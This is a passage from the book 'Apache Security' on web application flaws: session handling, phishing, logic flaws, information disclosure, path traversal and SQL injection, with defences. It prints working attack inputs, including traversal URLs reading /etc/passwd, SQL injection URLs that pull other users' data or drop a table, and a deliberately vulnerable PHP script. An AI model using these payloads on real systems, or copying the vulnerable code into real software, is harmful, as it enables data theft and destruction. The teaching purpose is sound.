Apache Security: Chapter 10. Web Application Security

Session Management Attacks

HTTP is a stateless protocol. It was never designed to handle sessions. Though this helped the Web take off, it presents a major problem for web application designers. No one anticipated the Web being used as an application platform. It would have been much better to have session management built right into the HTTP standard. But since it wasn’t, it is now re-implemented by every application separately. Cookies were designed to help with sessions but they fall short of finishing the job.

“Brute-Force Exploitation of Web Application Session Ids” by David Endler (iDEFENSE Labs) (http://www.blackhat.com/presentations/bh-usa-02/endler/iDEFENSE%20SessionIDs.pdf)

Typical session token problems include:

Tokens are short and can be cycled through easily.
Sequential session tokens are used.
Token values start repeating quickly.
Token generation is based on other predictable information, such as an IP address or time of session creation.

Good Practices

To conclude the discussion about session management, here are some best practices to demonstrate that a robust scheme requires serious thinking:

Create a session token upon first visit.
When performing authentication, destroy the old session and create a new one.
Limit session lifetime to a short period (a few hours).
Destroy inactive sessions regularly.
Destroy sessions after users log out.
Ask users to re-authenticate before an important task is performed (e.g., an order is placed).
Do not use the same session for a non-SSL part of the site as for the SSL part of the site because non-SSL traffic can be intercepted and the session token obtained from it. Treat them as two different servers.
If cookies are used to transport session tokens in an SSL application, they should be marked “secure.” Secure cookies are never sent over a non-SSL connection.
Regenerate session tokens from time to time.
Monitor client parameters (IP address, the User-Agent request header) and send warnings to the error log when they change. Some information (e.g., the contents of the User-Agent header) should not change for the lifetime of a session. Invalidate the session if it does.
If you know where your users are coming from, attach each session to a single IP address, and do not allow the address to change.
If you can, do not accept users coming through web proxies. This will be difficult to do for most public sites but easier for internal applications.
If you can, do not accept users coming through open web proxies. Open proxies are used when users want to stay anonymous or otherwise hide their tracks. You can detect which proxies are open by extracting the IP address of the proxy from each proxied request and having a script automatically test whether the proxy is open or not.
If you do allow web proxies, consider using Java applets or Flash movies (probably a better choice since such movies can pretend to be regular animations) to detect the users’ real IP addresses. It’s a long shot but may work in some cases.

An excellent overview of the problems of session management is available in the following paper:

“Web Based Session Management: Best practices in managing HTTP Based Client Sessions“ by Gunter Ollmann (http://www.technicalinfo.net/papers/WebBasedSessionManagement.html)

Attacks on Clients

Though attacks on clients are largely irrelevant for web application security (the exception being the use of JavaScript to steal session tokens), we will cover them briefly from the point of view that if you are in charge of a web application deployment, you must cover all attack vectors.

Typical Client Attack Targets

Here are some of the things that may be targeted:

Browser flaws
Java applets
Browser plug-ins (such as Flash or Shockwave)
JavaScript/VBScript embedded code

Attacking any of these is difficult. Most of the early flaws have been corrected. Someone may attempt to create a custom Mozilla plug-in or Internet Explorer ActiveX component, but succeeding with that requires the victim to willingly accept running the component. If your users are doing that, then you have a bigger problem with all the viruses spreading around. The same users can easily become victims of phishing (see the next section).

Internet Explorer is a frequent target because of its poor security record. In my opinion, Internet Explorer, Outlook, and Outlook Express should not be used in environments that require a high level of security until their security improves. You are better off using software such as Mozilla Suite (or now separate packages Firefox and Thunderbird).

Phishing

Phishing is a shorter version of the term password fishing. It is used for attacks that try to trick users into submitting passwords and other sensitive private information to the attacker by posing as someone else. The process goes like this:

Someone makes a copy of a popular password-protected web site (we are assuming passwords are protecting something of value). Popular Internet sites such as Citibank, PayPal, and eBay are frequent targets.
This person sends forged email messages to thousands, or even millions, of users, pretending the messages are sent from the original web site and directing people to log in to the forged site. Attackers usually use various techniques to hide the real URL the users are visiting.
Naïve users will attempt to login and the attacker will record their usernames and passwords. The attacker can now redirect the user to the real site. The user, thinking there was a glitch, attempts to log in again (this time to the real site), succeeds, thinks everything is fine, and doesn’t even notice the credentials were stolen.
The attacker can now access the original password-protected area and exploit this power, for example by transferring funds from the victim’s account to his own.

Now think of your precious web application; could your users become victims of a scam like this? If you think the chances are high, do the following:

Educate your users about potential dangers. Explain how you will never send emails asking them about their security details or providing links to log in. Provide a way for users to verify that the emails they receive are genuine (from you, not an attacker).
Restrict application access based on IP address and possibly based on time of access. This technique works, but you will be able to use it only for internal applications, where you can control where the users are logging in from.
Record who is logging on, when, and from which IP address. Then implement automated tools to establish usage patterns and detect anomalies.

Phishing is a real problem, and very difficult to solve. One solution may be to deploy SSL with client certificates required (or using any other Type 2 authentication method, where users must have something with them to use for authentication). This will not prevent users from disclosing their credentials but will prevent the attacker from using them to access the site because the attacker will be missing the appropriate certificate. Unfortunately, client certificates are difficult to use, so this solution only works for smaller applications and closely controlled user groups. A proper solution is yet to be determined but may revolve around the following ideas:

Deprecate insecure authentication methods, such as Basic authentication, because they send user credentials to the site verbatim.
Design new authentication methods (or upgrade Digest implementations) to allow for mutual authentication (clients to servers and servers to clients).
Upgrade the existing protocols to take the human factor into account as well.
Design better client applications (as discussed in the section Section 4.2.2 in Chapter 4).
Continue educating users.

No quick remedies will be created for the phishing problem, since none of the ideas will be easy to implement. The following resources are useful if you want to learn more about this subject:

Anti-Phishing Working Group (http://www.antiphishing.org)
“The Phishing Guide” by Gunter Ollmann (NGS) (http://www.nextgenss.com/papers/NISR-WP-Phishing.pdf)

Application Logic Flaws

Application logic flaws are the result of a lack of understanding of the web application programming model. Programmers are often deceived when something looks right and they believe it works right too. Most flaws can be tracked down to two basic errors:

Information that comes from the client is trusted and no (or little) validation is performed.
Process state is not maintained on the server (in the application).

I explain the errors and the flaws resulting from them through a series of examples.

Cookies and Hidden Fields

Information stored in cookies and hidden form fields is not visible to the naked eye. However, it can be accessed easily by viewing the web page source (in the case of hidden fields) or configuring the browser to display cookies as they arrive. Browsers in general do not allow anyone to change this information, but it can be done with proper tools. (Paros, described in the Appendix A, is one such tool.)

Because browsers do not allow anyone to change cookie information, some programmers use cookies to store sensitive information (application data). They send cookies to the client, accept them back, and then use the application data from the cookie in the application. However, the data has already been tainted.

Imagine an application that uses cookies to authenticate user sessions. Upon successful authentication, the application sends the following cookie to the client (I have emphasized the application data):

Set-Cookie: authenticated=true; path=/; domain=www.example.com

The application assumes that whoever has a cookie named authenticated containing true is an authenticated user. With such a concept of security, the attacker only needs to forge a cookie with the same content and access the application without knowing the username or the password.

Allowing users to interfere with application internal data often results in attackers being able to do the following:

Change product price (usually found in simpler shopping carts)
Gain administrative privileges (vertical privilege escalation)
Impersonate other users (horizontal privilege escalation)

An example of this type of flaw can be found in numerous form-to-email scripts. To enable web designers to have data sent to email without a need to do any programming, all data is stored as hidden form fields:

<form action="/cgi-bin/FormMail" method="POST">
<input type="hidden" name="subject" value="Call me back">
<input type="hidden" name="recipient" value="sales@example.com">
<!-- the visible part of the form follows here -->
</form>

As was the case with cookies, the recipient field can be manipulated to send email to any email address. Spammers were quick to exploit this type of fault, using form-to-email scripts to send unsolicited email messages.

Many form-to-email scripts still work this way but have been improved to send email only to certain domains, making them useless to spammers.

POST Method

Some believe the POST request method is more secure than GET. It is not. GET and POST both exist because they have different meanings, as explained in the HTTP specification:

GET request methods should only cause information about a resource to be transmitted from the server to the client. It should never be used to cause a change of the resource.
POST request methods should be used only to make changes to resources on the server.

Because a casual user cannot perform a POST request just like that—a GET request only requires typing the URL into the location field, while a POST request requires basic knowledge of HTML—people think POST requests are somehow safe. An example of this misplaced trust is given in the next section.

Referrer Check Flaws

The referrer field is a special header field added to each request by HTTP clients (browsers). Not having been created by the server, its contents cannot be trusted. But a common mistake is to rely on the referrer field for security.

Early versions of many form-to-email scripts did that. They checked the Referer request field (also known as HTTP_REFERER) and refused to work when the contents did not contain a proper address. This type of check has value. Because browsers populate the referrer field correctly, it becomes impossible to use the form-to-email script from another web site. However, it does not protect against spammers, who can programmatically create HTTP requests.

Process State Management

Process state management is difficult to do in web applications, and most programmers do not do it when they know they should. This is because most programming environments support stateless programming well, but do not help with stateful operations. Take a user registration process, for example, one that consists of three steps:

Choose a username.
Enter personal details.
Perform registration.

Choosing a username that is not already in use is vital for the process as a whole. The user should be allowed to continue on to the second step only after she chooses an unused username. However, a stateless implementation of this process does not remember a user’s past actions. So if the URL of the second step is easy to guess (e.g., register2.php), the user can type in the address and enter step 2 directly, giving as a parameter a username that has not been validated (and possibly choosing an existing username).

Depending on how the rest of the process is coded, this can lead to an error at the end (in the best case) or to database inconsistency (in the worst case).

Another good example of this problem is the use of form-to-email scripts for registration before file download. In many cases, this is a stateless two-step process. The source code will reveal the URL of the second page, which usually contains a link for direct download.

Client-Side Validation

Relying only on client-side validation (JavaScript) to validate script input data is a result of a common misconception that an HTTP client is part of the web programming model. I cannot emphasize enough that it is not. From a security point of view, client-side JavaScript is just a mechanism that enhances user experience with the application because it gives form feedback instantly instead of having the user wait for the request to go to the server and return with some results. Besides, it is perfectly normal (and happens often) that a browser does not support JavaScript at all, or that the user turned off the support to increase security.

Lack of server-side validation can lead to any of the problems described in this chapter. This problem is often easy to detect. In the worst case (validation only performed in the client) simply attempting to use a web application with JavaScript turned off will result in many errors in a vulnerable application. In most cases, however, it is necessary to test each input separately to detect where the vulnerabilities lie.

Information Disclosure

The more bad guys know about your system, the easier it becomes to find a way to compromise it. Information disclosure refers to the family of flaws that reveal inside information.

HTML Source Code

There is more in HTML pages than most people see. A thorough analysis of HTML page source code can reveal useful information. The structure of the source code is itself important because it can tell a lot about the person who wrote it. You can judge that person’s design and programming skills and learn what to expect.

HTML comments: You can commonly find comments in HTML code. For web designers, it is the only place for comments other designers can see. Even programmers, who should be writing comments in code and not in HTML (comments in code are never sent to browsers) sometimes make a mistake and put in information that should not be there.
JavaScript code: The JavaScript code can reveal even more about the coder’s personality. Parts of the code that deal with data validation can reveal information about application business rules. Programmers sometimes fail to implement data validation on the server side, relying on the client-side JavaScript instead. Knowing the business rules makes it easier to test for boundary cases.
Tool comments and metadata: Tools used to create pages often put comments in the code. Sometimes they reveal paths on the filesystem. You can identify the tool used, which may lead to other discoveries (see the “Predictable File Locations“ section below).

Directory Listings

A directory listing is a dynamically generated page showing the contents of a requested folder. Web servers creating such listings are only trying to be helpful, and they usually do so only after realizing the default index file (index.html, index.php, etc.) is absent. Directory listings are sometimes served to the client even when a default index file exists, as a result of web server vulnerability. This happens to be one of the most frequent Apache problems, as you can see from the following list of releases and their directory listing vulnerabilities. (The Common Vulnerability and Exposure numbers are inside the parentheses; see http://cve.mitre.org.)

v1.3.12 Requests can cause directory listing on NT (CVE-2000-0505).
v1.3.17 Requests can cause directory listing to be displayed (CVE-2001-0925).
v1.3.20 Multiviews can cause a directory listing to be displayed (CVE-2001-0731).
v1.3.20 Requests can cause directory listing to be displayed on Win32 (CVE-2001-0729).

A directory-listing service is not needed in most cases and should be turned off. Having a web server configured to produce directory listings where they are not required should be treated as a configuration error.

The problem with directory listings is in what they show, coupled with how people behave:

Many people do not understand that the absence of a link pointing to a file does not protect the file from those who know it is there.
Some people do know but think no one will find out (they are too lazy to set up a proper environment for sharing files).
Files are created by mistake (for example, file editors often create backup files), or are left there by mistake (for example, “I’ll put this file here just for a second and delete it later“).

In the worst-case scenario, a folder used exclusively to store files for download (some of which are private) will be left without a default file. The attacker only needs to enter the URL of the folder to gain access to the full list of files. Turning directory listings off (using Options -Indexes, as shown in Chapter 2) is essential, but it is not a complete solution, as you will see soon.

WebDAV

Web Distributed Authoring and Versioning (WebDAV), defined at http://www.ietf.org/rfc/rfc2518.txt, is an extension of the HTTP protocol. It consists of several new request methods that are added on top of HTTP to allow functionality such as search (for files), copy, and delete. Left enabled on a web site, WebDAV will allow anyone to enumerate files on the site, even with all directory indexes in place or directory listings turned off.

What follows is a shortened response from using telnet to connect to a web site that contains only three files (the root folder counts as one) and then sending the PROPFIND request (new with WebDAV) asking for the contents of the web server root folder. Users browsing normally would get served index.html as the home page but you can see how WebDAV reveals the existence of the file secret.data. I have emphasized the parts of the output that reveal the filenames.

$ telnet ivanristic.com 8080
Trying 217.160.182.153...
Connected to ivanristic.com.
Escape character is '^]'.
PROPFIND / HTTP/1.0
Depth: 1
   
HTTP/1.1 207 Multi-Status
Date: Sat, 22 May 2004 19:21:32 GMT
Server: Apache/2.0.49 (Unix) DAV/2 PHP/4.3.4
Connection: close
Content-Type: text/xml; charset="utf-8"
   
<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>/</D:href>
<D:propstat>
<D:prop>
...
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>/secret.data</D:href>
<D:propstat>
<D:prop>
...
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>/index.html</D:href>
<D:propstat>
<D:prop>
...
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>

Information disclosure through WebDAV is a configuration error (WebDAV should never be enabled for the general public). I mention it here because the consequences are similar to those of providing unrestricted directory listings. Some Linux distributions used to ship with WebDAV enabled by default, resulting in many sites unwillingly exposing their file listings to the public.

Verbose Error Messages

“Secure by default” is not a concept appreciated by many application server vendors who deliver application servers in developer-friendly mode where each error results in a detailed message being displayed in the browser. Administrators are supposed to change the configuration before deployment but they often do not do so.

This behavior discloses a lot of information that would otherwise be invisible to an attacker. It allows attackers to detect other flaws (e.g., configuration flaws) and to learn where files are stored on the filesystem, leading to successful exploitation.

A correct strategy to deal with this problem is as follows. (See Chapter 2 for technical details.)

Configure server software (web server, application server, etc.) such that it does not display verbose error messages to end users and instead logs them into a log file.
Instruct developers to do the same for the applications and have applications respond with HTTP status 500 whenever an error occurs.
Install custom error pages using the Apache ErrorDocument directive.

If all else fails (you have to live with an application that behaves incorrectly and you cannot change it), a workaround is possible with Apache 2 and mod_security. Using output filtering (described in Chapter 12), error messages can be detected and replaced with less dangerous content before the response is delivered to the client.

Debug Messages

Programmers often need a lot of information from an application to troubleshoot problems. This information is often presented at the bottom of each page when the application is being executed in debug mode. The information displayed includes:

Application configuration parameters (which may include passwords)
System environment variables
Request details (IP addresses, headers, request parameters)
Information that resulted from processing the request, such as script variables, or SQL queries
Various log messages

The effect of all this being disclosed to someone other than a developer can be devastating. The key question is, how is an application getting into debug mode?

Special request parameters: Programmers often use special request parameters, which work across the application. When such a method becomes known (and it often does) anyone appending the parameter (for example debug=1) to a URL can change into the debug mode.
Special request parameters with passwords: A slightly better approach is to use a password to protect the debug mode. Although better, chances are programmers will use a default password that does not change across application installations.
Automatic debug mode based on IP address: When a programming team sits behind a fixed set of IP addresses, they often configure the application to display debugging information automatically, upon detecting a “trusted” visitor. This approach is common for internal teams developing custom applications.
Session-based debug mode: One of the safer approaches is to have debug mode as one of the application privileges and assign the privilege to certain accounts. This approach represents a good compromise and delegates debug mode authorization to central authorization code, where such a decision belongs.

My recommendation is to have the debug mode turned off completely for production systems (and when I say turned off, I mean commented out of the source code).

Alternatively, a special request parameter (password-protected) can be used as an indicator that debug mode is needed, but the information would be dumped to a place (such as a log file) where only a developer can access it.

File Disclosure

File disclosure refers to the case when someone manages to download a file that would otherwise remain hidden or require special authorization.

Path Traversal

Path traversal occurs when directory backreferences are used in a path to gain access to the parent folder of a subfolder. If the software running on a server fails to resolve backreferences, it may also fail to detect an attempt to access files stored outside the web server tree. This flaw is known as path traversal or directory traversal. It can exist in a web server (though most web servers have fixed these problems) or in application code. Programmers often make this mistake.

If it is a web server flaw, an attacker only needs to ask for a file she knows is there:

http://www.example.com/../../etc/passwd

Even when she doesn’t know where the document root is, she can simply increase the number of backreferences until she finds it.

Note

Apache 1 will always respond with a 404 response code to any request that contains a URL-encoded slash (%2F) in the filename even when the specified file exists on the filesystem. Apache 2 allows this behavior to be configured at runtime using the AllowEncodedSlashes directive.

Application Download Flaws

Under ideal circumstances, files will be downloaded directly using the web server. But when a nontrivial authorization scheme is needed, the download takes place through a script after the authorization. Such scripts are web application security hot spots. Failure to validate input in such a script can result in arbitrary file disclosure.

Imagine a set of pages that implement a download center. Download happens through a script called download.php, which accepts the name of the file to be downloaded in a parameter called filename. A careless programmer may form the name of the file by appending the filename to the base directory:

$file_path = $repository_path + "/" + $filename;

An attacker can use the path traversal attack to request any file on the web server:

http://www.example.com/download.php?filename=../../etc/passwd

You can see how I have applied the same principle as before, when I showed attacking the web server directly. A naïve programmer will not bother with the repository path, and will accept a full file path in the parameter, as in:

http://www.example.com/download.php?filename=/etc/passwd

A file can also be disclosed to an attacker through a vulnerable script that uses a request parameter in an include statement:

include($file_path);

PHP will attempt to run the code (making this flaw more dangerous, as I will discuss later in the section “Code Execution”), but if there is no PHP code in the file it will output the contents of the file to the browser.

Source Code Disclosure

Source code disclosure usually happens when a web server is tricked into displaying a script instead of executing it. A popular way of doing this is to modify the URL enough to confuse the web server (and prevent it from determining the MIME type of the file) and simultaneously keep the URL similar enough to the original to allow the operating system to find it. This will become clearer after a few examples.

URL-encoding some characters in the request used to cause Tomcat and WebLogic to display the specified script file instead of executing it (see http://www.securityfocus.com/bid/2527). In the following example, the letter p in the extension .jsp is URL-encoded:

http://www.example.com/index.js%70

Appending a URL-encoded null byte to the end of a request used to cause JBoss to reveal the source code (see http://www.securityfocus.com/bid/7764).

http://www.example.com/web-console/ServerInfo.jsp%00

Note

Apache will respond with a 404 (Not found) response to any request that contains a URL-encoded null byte in the filename.

Many web servers used to get confused by the mere use of uppercase letters in the file extension (an attack effective only on platforms with case-insensitive filesystems):

http://www.example.com/index.JSP

Another way to get to the source code is to exploit a badly written script that is supposed to allow selective access to source code. At one point, Internet Information Server shipped with such a script enabled by default (see http://www.securityfocus.com/bid/167). The script was supposed to show source code to the example programs only, but because programmers did not bother to check which files were being requested, anyone was able to use the script to read any file on the system. Requesting the following URL, for example, returned the contents of the boot.ini file from the root of the C: drive:

http://www.sitename.com/msadc/Samples/SELECTOR/showcode.asp?source=
/msadc/Samples/../../../../../boot.ini

Most of the vulnerabilities are old because I chose to reference the popular servers to make the examples more interesting. You will find that new web servers almost always suffer from these same problems.

Predictable File Locations

You have turned directory listings off and you feel better now? Guessing filenames is sometimes easy:

Temporary files: If you need to perform a quick test on the web server, chances are you will name the file according to the test you wish to make. Names like upload.php, test.php, and phpinfo.php are common (the extensions are given for PHP but the same logic applies to other environments).
Renamed files: Old files may be left on the server with names such as index2.html, index.old.html, or index.html.old.
Application-generated files: Web authoring applications often generate files that find their way to the server. (Of course, some are meant to be on the server.) A good example is a popular FTP client, WS_FTP. It places a log file into each folder it transfers to the web server. Since people often transfer folders in bulk, the log files themselves are transferred, exposing file paths and allowing the attacker to enumerate all files. Another example is CityDesk, which places a list of all files in the root folder of the site in a file named citydesk.xml. Macromedia’s Dreamweaver and Contribute have many publicly available files.
Configuration management files: Configuration management tools create many files with metadata. Again, these files are frequently transferred to the web site. CVS, the most popular configuration management tool, keeps its files in a special folder named CVS. This folder is created as a subfolder of every user-created folder, and it contains the files Entries, Repository, and Root.
Backup files: Text editors often create backup files. When changes are performed directly on the server, backup files remain there. Even when created on a development server or workstation, by the virtue of bulk folder FTP transfer, they end up on the production server. Backup files have extensions such as ~, .bak, .old, .bkp, .swp.
Exposed application files: Script-based applications often consist of files not meant to be accessed directly from the web server but instead used as libraries or subroutines. Exposure happens if these files have extensions that are not recognized by the web server as a script. Instead of executing the script, the server sends the full source code in response. With access to the source code, the attacker can look for security-related bugs. Also, these files can sometimes be manipulated to circumvent application logic.
Publicly accessible user home folders: Sometimes user home directories are made available under the web server. As a consequence, command-line history can often be freely downloaded. To see some examples, type inurl:.bash_history into Google. (The use of search engines to perform reconnaissance is discussed in Chapter 11.)

Most downloads of files that should not be downloaded happen because web servers do not obey one of the fundamental principles of information security—i.e., they do not fail securely. If a file extension is not recognized, the server assumes it is a plain text file and sends it anyway. This is fundamentally wrong.

You can do two things to correct this. First, configure Apache to only serve requests that are expected in an application. One way to do this is to use mod_rewrite and file extensions.

# Reject requests with extensions we don't approve
RewriteCond %{SCRIPT_FILENAME} "!(\.html|\.php|\.gif|\.png|\.jpg)$"
RewriteRule .* - [forbidden]

Now even if someone uploads a spreadsheet document to the web server, no one will be able to see it because the mod_rewrite rules will block access. However, this approach will not protect files that have allowed extensions but should not be served. Using mod_rewrite, we can create a list of requests we are willing to accept and serve only those. Create a plain text file with the allowed requests listed:

# This file contains a list of requests we accept. Because
# of the way mod_rewrite works each line must contain two
# tokens, but the second token can be anything.
#
/ -
/index.php -
/news.php -
/contact.php -

Add the following fragment to the Apache configuration. (It is assumed the file you created was placed in /usr/local/apache/conf/allowed_urls.map.)

# Associate a name with a map stored in a file on disk
RewriteMap allowed_urls txt:/usr/local/apache/conf/allowed_urls.map
   
# Try to determine if the value of variable "$0" (populated with the
# request URI in this case) appears in the rewrite map we defined
# in the previous step. If there is a match the value of the
# "${allowed_urls:$0|notfound}" variable will be replaced with the
# second token in the map (always "-" in our case). In all other cases
# the variable will be replaced by the default value, the string that
# follows the pipe character in the variable - "notfound".
RewriteCond ${allowed_urls:$0|notfound} ^notfound$
   
# Reject the incoming request when the previous rewrite
# condition evaluates to true.
RewriteRule .* - [forbidden]

Injection Flaws

Finally, we reach a type of flaw that can cause serious damage. If you thought the flaws we have covered were mostly harmless you would be right. But those flaws were a preparation (in this book, and in successful compromise attempts) for what follows.

Injection flaws get their name because when they are used, malicious user-supplied data flows through the application, crosses system boundaries, and gets injected into another system component. System boundaries can be tricky because a text string that is harmless for PHP can turn into a dangerous weapon when it reaches a database.

Injection flaws come in as many flavors as there are component types. Three flaws are particularly important because practically every web application can be affected:

SQL injection: When an injection flaw causes user input to modify an SQL query in a way that was not intended by the application author
Cross-site scripting (XSS): When an attacker gains control of a user browser by injecting HTML and Java-Script code into the page
Operating system command execution: When an attacker executes shell commands on the server

Other types of injection are also feasible. Papers covering LDAP injection and XPath injection are listed in the section Section 10.9.

SQL Injection

SQL injection attacks are among the most common because nearly every web application uses a database to store and retrieve data. Injections are possible because applications typically use simple string concatenation to construct SQL queries, but fail to sanitize input data.

A working example

SQL injections are fun if you are not at the receiving end. We will use a complete programming example and examine how these attacks take place. We will use PHP and MySQL 4.x. You can download the code from the book web site, so do not type it.

Create a database with two tables and a few rows of data. The database represents an imaginary bank where my wife and I keep our money.

CREATE DATABASE sql_injection_test;
   
USE sql_injection_test;
   
CREATE TABLE customers (
    customerid INTEGER NOT NULL,
    username CHAR(32) NOT NULL,
    password CHAR(32) NOT NULL,
    PRIMARY KEY(customerid)
);
   
INSERT INTO customers ( customerid, username, password )
    VALUES ( 1, 'ivanr', 'secret' );
   
INSERT INTO customers ( customerid, username, password )
    VALUES ( 2, 'jelena', 'alsosecret' );
   
CREATE TABLE accounts (
    accountid INTEGER NOT NULL,
    customerid INTEGER NOT NULL,
    balance DECIMAL(9, 2) NOT NULL,
    PRIMARY KEY(accountid)
);
   
INSERT INTO accounts ( accountid, customerid, balance )
    VALUES ( 1, 1, 1000.00 );
   
INSERT INTO accounts ( accountid, customerid, balance )
    VALUES ( 2, 2, 2500.00 );

Create a PHP file named view_customer.php with the following code inside, and set the values of the variables at the top of the file as appropriate to enable the script to establish a connection to your database:

<?
   
$dbhost = "localhost";
$dbname = "sql_injection_test";
$dbuser = "root";
$dbpass = "";
   
// connect to the database engine
if (!mysql_connect($dbhost, $dbuser, $dbpass)) {
   die("Could not connect: " . mysql_error());
}
   
// select the database
if (!mysql_select_db($dbname)) {
   die("Failed to select database $dbname:" . mysql_error());
}
   
// construct and execute query
$query = "SELECT username FROM customers WHERE customerid = "
    . $_REQUEST["customerid"];
   
$result = mysql_query($query);
if (!$result) {
   die("Failed to execute query [$query]: " . mysql_error());
}
   
// show the result
while ($row = mysql_fetch_assoc($result)) {
    echo "USERNAME = " . $row["username"] . "<br>";
}
   
// close the connection
mysql_close();
   
?>

This script might be written by a programmer who does not know about SQL injection attacks. The script is designed to accept the customer ID as its only parameter (named customerid). Suppose you request a page using the following URL:

http://www.example.com/view_customer.php?customerid=1

The PHP script will retrieve the username of the customer (in this case, ivanr) and display it on the screen. All seems well, but what we have in the query in the PHP file is the worst-case SQL injection scenario. The customer ID supplied in a parameter becomes a part of the SQL query in a process of string concatenation. No checking is done to verify that the parameter is in the correct format. Using simple URL manipulation, the attacker can inject SQL commands directly into the database query, as in the following example:

http://www.example.com/view_customer.php?customerid=1%20OR%20customerid%3D2

If you specify the URL above, you will get two usernames displayed on the screen instead of a single one, which is what the programmer intended for the program to supply. Notice how we have URL-encoded some characters to put them into the URL, specifying %20 for the space character and %3D for an equals sign. These characters have special meanings when they are a part of a URL, so we had to hide them to make the URL work. After the URL is decoded and the specified customerid sent to the PHP program, this is what the query looks like (with the user-supplied data emphasized for clarity):

SELECT username FROM customers WHERE customerid = 1 OR customerid=2

This type of SQL injection is the worst-case scenario because the input data is expected to be an integer, and in that case many programmers neglect to validate the incoming value. Integers can go into an SQL query directly because they cannot cause a query to fail. This is because integers consist only of numbers, and numbers do not have a special meaning in SQL. Strings, unlike integers, can contain special characters (such as single quotation marks) so they have to be converted into a representation that will not confuse the database engine. This process is called escaping and is usually performed by preceding each special character with a backslash character. Imagine a query that retrieves the customer ID based on the username. The code might look like this:

$query = "SELECT customerid FROM customers WHERE username = '"
    . $_REQUEST["username"] . "'";

You can see that the data we supply goes into the query, surrounded by single quotation marks. That is, if your request looks like this:

http://www.example.com/view_customer.php?username=ivanr

The query becomes:

SELECT customerid FROM customers WHERE username = 'ivanr'

Appending malicious data to the page parameter as we did before will do little damage because whatever is surrounded by quotes will be treated by the database as a string and not a query. To change the query an attacker must terminate the string using a single quote, and only then continue with the query. Assuming the previous query construction, the following URL would perform an SQL injection:

http://www.example.com/view_customer.php?username=ivanr'%20OR
%20username%3D'jelena'--%20

By adding a single quote to the username parameter, we terminated the string and entered the query space. However, to make the query work, we added an SQL comment start (--) at the end, neutralizing the single quote appended at the end of the query in the code. The query becomes:

SELECT customerid FROM customers WHERE username = 'ivanr'
OR username='jelena'-- '

The query returns two customer IDs, rather than the one intended by the programmer. This type of attack is actually often more difficult to do than the attack in which single quotes were not used because some environments (PHP, for example) can be configured to automatically escape single quotes that appear in the input URL. That is, they may change a single quote (’) that appears in the input to \’, in which the backslash indicates that the single quote following it should be interpreted as the single quote character, not as a quote delimiting a string. Even programmers who are not very security-conscious will often escape single quotes because not doing so can lead to errors when an attempt is made to enter a name such as O'Connor into the application.

Though the examples so far included only the SELECT construct, INSERT and DELETE statements are equally vulnerable. The only way to avoid SQL injection problems is to avoid using simple string concatenation as a way to construct queries. A better (and safe) approach, is to use prepared statements. In this approach, a query template is given to the database, followed by the separate user data. The database will then construct the final query, ensuring no injection can take place.

Union

We have seen how SQL injection can be used to access data from a single table. If the database system supports the UNION construct (which MySQL does as of Version 4), the same concept can be used to fetch data from multiple tables. With UNION, you can append a new query to fetch data and add it to the result set. Suppose the parameter customerid from the previous example is set as follows:

http://www.example.com/view_customer.php?customerid=1%20UNION%20ALL
%20SELECT%20balance%20FROM%20accounts%20WHERE%20customerid%3D2

the query becomes:

SELECT username FROM customers WHERE customerid = 1
UNION ALL SELECT balance FROM accounts WHERE customerid=2

The original query fetches a username from the customers table. With UNION appended, the modified query fetches the username but it also retrieves an account balance from the accounts table.

Multiple statements in a query

Things become really ugly if the database system supports multiple statements in a single query. Though our attacks so far were a success, there were still two limitations:

We had to append our query fragment to an existing query, which limited what we could do with the query.
We were limited to the type of the query used by the programmer. A SELECT query could not turn into DELETE or DROP TABLE.

With multiple statements possible, we are free to submit a custom-crafted query to perform any action on the database (limited only by the permissions of the user connecting to the database).

When allowed, statements are separated by a semicolon. Going back to our first example, here is the URL to remove all customer information from the database:

http://www.example.com/view_customer.php?customerid=1;DROP%20
TABLE%20customers

After SQL injection takes place, the second SQL query to be executed will be DROP TABLE customers.

Special database features

Exploiting SQL injection flaws can be hard work because there are many database engines, and each engine supports different features and a slightly different syntax for SQL queries. The attacker usually works to identify the type of database and then proceeds to research its functionality in an attempt to use some of it.

Databases have special features that make life difficult for those who need to protect them:

You can usually enumerate the tables in the database and the fields in a table. You can retrieve values of various database parameters, some of which may contain valuable information. The exact syntax depends on the database in place.
Microsoft SQL server ships with over 1,000 built-in stored procedures. Some do fancy stuff such as executing operating system code, writing query output into a file, or performing full database backup over the Internet (to the place of the attacker’s choice, of course). Stored procedures are the first feature attackers will go for if they discover an SQL injection vulnerability in a Microsoft SQL server.
Many databases can read and write files, usually to perform data import and export. These features can be exploited to output the contents of the database, where it can be accessed by an attacker. (This MySQL feature was instrumental in compromising Apache Foundation’s own web site, as described at http://www.dataloss.net/papers/how.defaced.apache.org.txt.)

SQL injection attack resources

We have only exposed the tip of the iceberg with our description of SQL injection flaws. Being the most popular flaw, they have been heavily researched. You will find the following papers useful to learn more about such flaws.

“SQL Injection” by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf)
“Advanced SQL Injection in SQL Server Applications” by Chris Anley (NGS) (http://www.nextgenss.com/papers/advanced_sql_injection.pdf)
“(more) Advanced SQL Injection” by Chris Anley (NGS) (http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf)
“Hackproofing MySQL” by Chris Anley (NGS) (http://www.nextgenss.com/papers/HackproofingMySQL.pdf)
“Blind SQL Injection” by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf)
“LDAP Injection” by Sacha Faust (SPI Dynamics) (http://www.spidynamics.com/whitepapers/LDAPinjection.pdf)
“Blind XPath Injection” by Amit Klein (Sanctum) (http://www.sanctuminc.com/pdf/WhitePaper_Blind_XPath_Injection.pdf)

Cross-Site Scripting

Unlike other injection flaws, which occur when the programmer fails to sanitize data on input, cross-site scripting (XSS) attacks occur on the output. If the attack is successful, the attacker will control the HTML source code, emitting HTML markup and JavaScript code at will.

